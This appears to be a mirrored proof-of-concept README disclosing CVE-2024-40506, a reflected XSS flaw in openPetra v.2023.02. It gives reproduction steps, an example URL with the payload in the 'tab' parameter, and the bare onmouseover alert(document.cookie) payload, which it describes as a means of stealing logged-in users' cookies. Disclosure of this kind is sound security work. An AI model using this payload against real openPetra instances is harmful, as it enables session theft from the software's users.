CVE-2024-40506 PoC — OpenPetra 安全漏洞

Source

Associated Vulnerability

Description

OpenPetra v.2023.02 CVE-2024-40506

Readme

# CVE-2024-40506
# Cross Site Scripting vulnerability in openPetra v.2023.02 via the serverMHospitality.asmx function.

**Description**: An unauthenticated user can steal cookies from authenticated user, by exploiting a XSS in openPetra v.2023.02 via the serverMHospitality.asmx function.

**Vulnerable Product Version**: openPetra v.2023.02  
**CVE Author**: Jansen Moreira 
**Date**: 13/07/2024  
**CVE**: CVE-2024-40506      
**CVE Link**: https://www.cve.org/CVERecord?id=CVE-2024-40506  
**NVD Link**: https://nvd.nist.gov/vuln/detail/CVE-2024-40506     
**Tenable Link**: https://www.tenable.com/cve/CVE-2024-40506  
**Confirmed on**: 13/07/2024                               
**Tested on**: Linux  
### Steps to reproduce:  
1- Access the home Page  
2- Use the following path and add the xss payload in the tab parametrer. EX.: 
```http://target.com/api/serverMHospitality.asmx?bnd=TMHospitalityWebServiceSoap&op=THospitalityWebConnector_Dummy&page=op&tab=x" onmouseover=alert(document.cookie) x="  ```                
3- Hover the mouse over the left index item to trigger the XSS  

**Payloads**:  
tab: x" onmouseover=alert(document.cookie) x="


Discoverer(s)/Credits:
Jansen Moreira 

File Snapshot

 [4.0K]  /data/pocs/c69c8274a004877b9cd5e4f82de9eea22bab647a
└── [1.2K]  README.md

0 directories, 1 file

Remarks